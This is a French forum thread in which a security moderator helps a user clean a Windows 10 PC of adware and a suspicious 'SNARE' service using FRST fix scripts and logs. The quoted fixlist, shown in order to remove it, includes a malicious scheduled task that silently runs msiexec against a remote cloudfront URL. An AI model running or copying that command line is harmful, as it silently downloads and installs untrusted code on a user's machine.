Rootkit SNARE et kitty
Fermé
Lydia
-
Modifié le 22 avril 2017 à 12:07
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 22 avril 2017 à 20:41
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 - 22 avril 2017 à 20:41
A voir également:
- Rootkit SNARE et kitty
- Anti rootkit - Télécharger - Antivirus & Antimalwares
- Rootkit hunter - Télécharger - Antivirus & Antimalwares
- Rootkit buster - Télécharger - Antivirus & Antimalwares
- Avg anti rootkit - Télécharger - Antivirus & Antimalwares
- Tablette hello kitty - Forum Téléphones & tablettes Android
5 réponses
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
21 avril 2017 à 22:21
21 avril 2017 à 22:21
Salut,
Peux-tu indiquer le fichier détecté puis :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Peux-tu indiquer le fichier détecté puis :
Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).
Télécharge et lance le scan FRST, 3 rapports FRST seront générés :
- FRST.txt
- Shortcut.txt
- Additionnal.txt
Envoie ces 3 rapports sur le site http://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.
Merci
Je sais pas exact quel fichier et détecté
Mais je vais essayer votre solution
PS: j'ai Windows 10 en duel avec Ubuntu 16.04
Je sais pas exact quel fichier et détecté
Mais je vais essayer votre solution
PS: j'ai Windows 10 en duel avec Ubuntu 16.04
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
22 avril 2017 à 11:18
22 avril 2017 à 11:18
Voici la correction à effectuer avec FRST. Tu peux t'aider de cette note explicative avec des captures d'écran.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
3°)
fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois s'il y a des améliorations
Refais un scan FRST et donne à nouveau les rapports via pjjoint.
Ouvre le bloc-notes : Touche Windows + R,
Dans le champs "Exécuter", saisir notepad et OK.
Copie/Colle dedans ce qui suit :
CreateRestorePoint:
CloseProcesses:
HKLM\...\Providers\y2ef69t3: C:\Program Files\Ivegerucery Controls\local32spl.dll
HKU\S-1-5-21-1474168596-3453967724-2227572114-1000\...\Run: [DrvUpdater] => C:\Users\DELL\AppData\Roaming\DRPSu\DrvUpdater.exe [195256 2015-02-19] ()
R2 SNARE; C:\Users\DELL\AppData\Local\SNARE\Snarer.dll [685568 2017-04-20] (InterSect Alliance Pty Ltd) [Fichier non signé]
2017-04-21 13:51 - 2017-04-21 14:23 - 00000000 _____ C:\WINDOWS\system32\22
2017-04-21 13:51 - 2017-04-21 14:23 - 00000000 _____ C:\WINDOWS\system32\11
C:\Users\DELL\AppData\Local\SNARE
Task: {0D7769FA-EF84-4AF2-8D2F-4D1276FD0481} - System32\Tasks\Ivegerucery Controls => C:\Program Files\Phudikthwisy\vervasy.exe
Task: {14B02527-ABF6-43C2-8C2C-85050B3B180A} - System32\Tasks\Shequlyqernily => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000LPVX-75V0TT0_WX71A25CX5XRA25CX5XR&v=2017223 /q <==== ATTENTION
Tas
2017-04-18 17:09 - 2017-04-21 10:24 - 00000000 ____D C:\Users\DELL\AppData\Local\SNARE
2017-04-18 17:09 - 2017-04-18 17:09 - 00000000 ____D C:\WINDOWS\Update
2017-04-16 21:28 - 2017-04-16 21:36 - 00000000 _____ C:\WINDOWS\system32\last.dump
2017-04-16 15:19 - 2017-04-16 15:19 - 00000000 ____D C:\Users\DELL\Desktop\TpBDD
2017-04-14 21:27 - 2017-04-14 21:27 - 00001499 _____ C:\Users\DELL\Desktop\chrome.lnk
2017-04-14 20:10 - 2017-04-14 20:10 - 00000000 ____D C:\Users\DELL\AppData\Local\Alltie
2017-04-14 20:10 - 2017-04-14 20:10 - 00000000 ____D C:\ProgramData\Software
2017-04-14 19:43 - 2017-04-21 20:37 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-14 19:43 - 2017-04-21 20:36 - 00000000 ____D C:\Users\DELL\AppData\Local\Kitty
2017-04-14 19:43 - 2017-04-21 16:53 - 00000000 _____ C:\Users\Public\Documents\report.dat
EmptyTemp:
RemoveProxy:
Reboot:
Une fois, le texte collé dans le Bloc-notes,
Menu "Fichier" puis "Enregistrer sous",
A gauche, place toi sur le Bureau,
Dans le champs en bas, nom du fichier mets : fixlist.txt
Clique sur "Enregistrer", cela va créer fixlist.txt sur le Bureau.
Relance FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire ( pas obligatoire )
Un fichier texte apparait, copie/colle le contenu ici dans un nouveau message.
Redémarre l'ordinateur.
2°)
Réinitialise/Répare les navigateurs WEB concernés par les problèmes :
- Réparer Mozilla Firefox (premier paragraphe)
- Réparer Google Chrome (seulement le premier paragraphe).
- Réinitialiser et réparer Internet Explorer
3°)
fais un nettoyage Malwarebytes - Tutoriel Malwarebytes Anti-Malware version gratuite
4°)
Vois s'il y a des améliorations
Refais un scan FRST et donne à nouveau les rapports via pjjoint.
Résultats de correction de Farbar Recovery Scan Tool (x86) Version: 20-04-2017
Exécuté par Lydia (22-04-2017 09:45:23) Run:2
Exécuté depuis C:\Users\DELL\Desktop
Profils chargés: Lydia (Profils disponibles: Lydia)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
HKLM\...\Providers\y2ef69t3: C:\Program Files\Ivegerucery Controls\local32spl.dll
HKU\S-1-5-21-1474168596-3453967724-2227572114-1000\...\Run: [DrvUpdater] => C:\Users\DELL\AppData\Roaming\DRPSu\DrvUpdater.exe [195256 2015-02-19] ()
R2 SNARE; C:\Users\DELL\AppData\Local\SNARE\Snarer.dll [685568 2017-04-20] (InterSect Alliance Pty Ltd) [Fichier non signé]
2017-04-21 13:51 - 2017-04-21 14:23 - 00000000 _____ C:\WINDOWS\system32\22
2017-04-21 13:51 - 2017-04-21 14:23 - 00000000 _____ C:\WINDOWS\system32\11
C:\Users\DELL\AppData\Local\SNARE
Task: {0D7769FA-EF84-4AF2-8D2F-4D1276FD0481} - System32\Tasks\Ivegerucery Controls => C:\Program Files\Phudikthwisy\vervasy.exe
Task: {14B02527-ABF6-43C2-8C2C-85050B3B180A} - System32\Tasks\Shequlyqernily => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000LPVX-75V0TT0_WX71A25CX5XRA25CX5XR&v=2017223 /q <==== ATTENTION
Tas
2017-04-18 17:09 - 2017-04-21 10:24 - 00000000 ____D C:\Users\DELL\AppData\Local\SNARE
2017-04-18 17:09 - 2017-04-18 17:09 - 00000000 ____D C:\WINDOWS\Update
2017-04-16 21:28 - 2017-04-16 21:36 - 00000000 _____ C:\WINDOWS\system32\last.dump
2017-04-16 15:19 - 2017-04-16 15:19 - 00000000 ____D C:\Users\DELL\Desktop\TpBDD
2017-04-14 21:27 - 2017-04-14 21:27 - 00001499 _____ C:\Users\DELL\Desktop\chrome.lnk
2017-04-14 20:10 - 2017-04-14 20:10 - 00000000 ____D C:\Users\DELL\AppData\Local\Alltie
2017-04-14 20:10 - 2017-04-14 20:10 - 00000000 ____D C:\ProgramData\Software
2017-04-14 19:43 - 2017-04-21 20:37 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-14 19:43 - 2017-04-21 20:36 - 00000000 ____D C:\Users\DELL\AppData\Local\Kitty
2017-04-14 19:43 - 2017-04-21 16:53 - 00000000 _____ C:\Users\Public\Documents\report.dat
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\y2ef69t3 => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order y2ef69t3 => non trouvé(e).
HKU\S-1-5-21-1474168596-3453967724-2227572114-1000\Software\Microsoft\Windows\CurrentVersion\Run\\DrvUpdater => valeur supprimé(es) avec succès
SNARE => service non trouvé(e).
C:\WINDOWS\system32\22 => déplacé(es) avec succès
C:\WINDOWS\system32\11 => déplacé(es) avec succès
C:\Users\DELL\AppData\Local\SNARE => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0D7769FA-EF84-4AF2-8D2F-4D1276FD0481} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D7769FA-EF84-4AF2-8D2F-4D1276FD0481} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Ivegerucery Controls => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ivegerucery Controls => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{14B02527-ABF6-43C2-8C2C-85050B3B180A} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{14B02527-ABF6-43C2-8C2C-85050B3B180A} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Shequlyqernily => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Shequlyqernily => clé supprimé(es) avec succès
Tas => Erreur: Pas de correction automatique trouvée pour cet élément.
"C:\Users\DELL\AppData\Local\SNARE" => non trouvé(e).
C:\WINDOWS\Update => déplacé(es) avec succès
C:\WINDOWS\system32\last.dump => déplacé(es) avec succès
C:\Users\DELL\Desktop\TpBDD => déplacé(es) avec succès
C:\Users\DELL\Desktop\chrome.lnk => déplacé(es) avec succès
C:\Users\DELL\AppData\Local\Alltie => déplacé(es) avec succès
C:\ProgramData\Software => déplacé(es) avec succès
C:\Users\Public\Documents\temp.dat => déplacé(es) avec succès
C:\Users\DELL\AppData\Local\Kitty => déplacé(es) avec succès
C:\Users\Public\Documents\report.dat => déplacé(es) avec succès
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1474168596-3453967724-2227572114-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1474168596-3453967724-2227572114-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 6053888 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 11578521 B
Java, Flash, Steam htmlcache => 2112 B
Windows/system/drivers => 7118 B
Edge => 162980716 B
Chrome => 5261001 B
Firefox => 13709984 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
LocalService => 1776 B
NetworkService => 383192 B
DELL => 11720127 B
RecycleBin => 6286 B
EmptyTemp: => 201.9 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Exécuté par Lydia (22-04-2017 09:45:23) Run:2
Exécuté depuis C:\Users\DELL\Desktop
Profils chargés: Lydia (Profils disponibles: Lydia)
Mode d'amorçage: Normal
==============================================
fixlist contenu:
CreateRestorePoint:
CloseProcesses:
HKLM\...\Providers\y2ef69t3: C:\Program Files\Ivegerucery Controls\local32spl.dll
HKU\S-1-5-21-1474168596-3453967724-2227572114-1000\...\Run: [DrvUpdater] => C:\Users\DELL\AppData\Roaming\DRPSu\DrvUpdater.exe [195256 2015-02-19] ()
R2 SNARE; C:\Users\DELL\AppData\Local\SNARE\Snarer.dll [685568 2017-04-20] (InterSect Alliance Pty Ltd) [Fichier non signé]
2017-04-21 13:51 - 2017-04-21 14:23 - 00000000 _____ C:\WINDOWS\system32\22
2017-04-21 13:51 - 2017-04-21 14:23 - 00000000 _____ C:\WINDOWS\system32\11
C:\Users\DELL\AppData\Local\SNARE
Task: {0D7769FA-EF84-4AF2-8D2F-4D1276FD0481} - System32\Tasks\Ivegerucery Controls => C:\Program Files\Phudikthwisy\vervasy.exe
Task: {14B02527-ABF6-43C2-8C2C-85050B3B180A} - System32\Tasks\Shequlyqernily => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=WDCXWD5000LPVX-75V0TT0_WX71A25CX5XRA25CX5XR&v=2017223 /q <==== ATTENTION
Tas
2017-04-18 17:09 - 2017-04-21 10:24 - 00000000 ____D C:\Users\DELL\AppData\Local\SNARE
2017-04-18 17:09 - 2017-04-18 17:09 - 00000000 ____D C:\WINDOWS\Update
2017-04-16 21:28 - 2017-04-16 21:36 - 00000000 _____ C:\WINDOWS\system32\last.dump
2017-04-16 15:19 - 2017-04-16 15:19 - 00000000 ____D C:\Users\DELL\Desktop\TpBDD
2017-04-14 21:27 - 2017-04-14 21:27 - 00001499 _____ C:\Users\DELL\Desktop\chrome.lnk
2017-04-14 20:10 - 2017-04-14 20:10 - 00000000 ____D C:\Users\DELL\AppData\Local\Alltie
2017-04-14 20:10 - 2017-04-14 20:10 - 00000000 ____D C:\ProgramData\Software
2017-04-14 19:43 - 2017-04-21 20:37 - 00000000 _____ C:\Users\Public\Documents\temp.dat
2017-04-14 19:43 - 2017-04-21 20:36 - 00000000 ____D C:\Users\DELL\AppData\Local\Kitty
2017-04-14 19:43 - 2017-04-21 16:53 - 00000000 _____ C:\Users\Public\Documents\report.dat
EmptyTemp:
RemoveProxy:
Reboot:
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\y2ef69t3 => clé supprimé(es) avec succès
HKLM\SYSTEM\CurrentControlSet\Control\Print\Providers\\order y2ef69t3 => non trouvé(e).
HKU\S-1-5-21-1474168596-3453967724-2227572114-1000\Software\Microsoft\Windows\CurrentVersion\Run\\DrvUpdater => valeur supprimé(es) avec succès
SNARE => service non trouvé(e).
C:\WINDOWS\system32\22 => déplacé(es) avec succès
C:\WINDOWS\system32\11 => déplacé(es) avec succès
C:\Users\DELL\AppData\Local\SNARE => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0D7769FA-EF84-4AF2-8D2F-4D1276FD0481} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0D7769FA-EF84-4AF2-8D2F-4D1276FD0481} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Ivegerucery Controls => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Ivegerucery Controls => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{14B02527-ABF6-43C2-8C2C-85050B3B180A} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{14B02527-ABF6-43C2-8C2C-85050B3B180A} => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Shequlyqernily => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Shequlyqernily => clé supprimé(es) avec succès
Tas => Erreur: Pas de correction automatique trouvée pour cet élément.
"C:\Users\DELL\AppData\Local\SNARE" => non trouvé(e).
C:\WINDOWS\Update => déplacé(es) avec succès
C:\WINDOWS\system32\last.dump => déplacé(es) avec succès
C:\Users\DELL\Desktop\TpBDD => déplacé(es) avec succès
C:\Users\DELL\Desktop\chrome.lnk => déplacé(es) avec succès
C:\Users\DELL\AppData\Local\Alltie => déplacé(es) avec succès
C:\ProgramData\Software => déplacé(es) avec succès
C:\Users\Public\Documents\temp.dat => déplacé(es) avec succès
C:\Users\DELL\AppData\Local\Kitty => déplacé(es) avec succès
C:\Users\Public\Documents\report.dat => déplacé(es) avec succès
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1474168596-3453967724-2227572114-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-1474168596-3453967724-2227572114-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
=========== EmptyTemp: ==========
BITS transfer queue => 6053888 B
DOMStoree, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 11578521 B
Java, Flash, Steam htmlcache => 2112 B
Windows/system/drivers => 7118 B
Edge => 162980716 B
Chrome => 5261001 B
Firefox => 13709984 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
LocalService => 1776 B
NetworkService => 383192 B
DELL => 11720127 B
RecycleBin => 6286 B
EmptyTemp: => 201.9 MB données temporaires supprimées.
================================
Le système a dû redémarrer.
Fin de Fixlog 09:47:59
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
22 avril 2017 à 12:02
22 avril 2017 à 12:02
ok fais la suite =)
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
pour Google c'est fait
mais pour Mozilla l n'y a pas "réparer Firefox" a coté il y a juste "redémarrer avec les module désactive "
Pour internet explorer c'est pas le même que dans les capture mais je suis allez dans "paramètre" et "paramètre avancé" j'ai pas trouver de réparer ni rien qui référé a ca
mais pour Mozilla l n'y a pas "réparer Firefox" a coté il y a juste "redémarrer avec les module désactive "
Pour internet explorer c'est pas le même que dans les capture mais je suis allez dans "paramètre" et "paramètre avancé" j'ai pas trouver de réparer ni rien qui référé a ca
Malekal_morte-
Messages postés
180304
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
24 627
22 avril 2017 à 20:41
22 avril 2017 à 20:41
Tu utilises quel navigateur WEB ?
21 avril 2017 à 23:07
http://pjjoint.malekal.com/files.php?id=20170421_b15w8e7r9y10
http://pjjoint.malekal.com/files.php?id=20170421_e9y11d13e6y5